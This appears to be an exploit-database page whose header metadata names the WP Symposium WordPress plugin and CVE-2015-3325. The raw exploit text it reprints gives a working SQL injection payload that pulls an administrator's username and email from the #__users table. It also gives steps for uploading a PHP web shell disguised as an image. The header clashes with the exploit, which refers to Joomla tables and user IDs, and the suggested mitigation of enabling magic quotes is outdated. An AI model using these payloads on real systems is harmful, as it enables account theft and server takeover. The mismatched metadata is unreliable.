header-logo
Suggest Exploit
vendor:
WP Symposium Plugin
by:
Hannes Trunde
N/A
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: WP Symposium Plugin
Affected Version From: 15.1
Affected Version To: 15.4
Patch Exists: NO
Related CWE: CVE-2015-3325
CPE: a:wordpress:wp_symposium_plugin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2015

SQL Injection

The exploit involves injecting malicious SQL code into a new event's description. The code retrieves the username and email of a user with a specific group ID from the #__users table. The user ID must be provided as part of the exploit. The extracted information can be found on the View Events page.

Mitigation:

To mitigate this vulnerability, enable magic quotes and ensure user accounts have limited privileges.
Source

Exploit-DB raw data:

SQL Injection
-------------

requires: magic quotes OFF, user account

Add this as the description of a new event:

'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25 
LIMIT 1),1,1,1) -- '

NOTE: 63 MUST be your Joomla user ID. extracted info can be found on 
View Events page


Remote File Inclusion
---------------------

requires: user account

Just upload your PHP shell (shell.jpg.php) through the Add Image screen, 
and find it's new URL in the View Images screen.

Navigation

Suggest Exploit

Services By CQR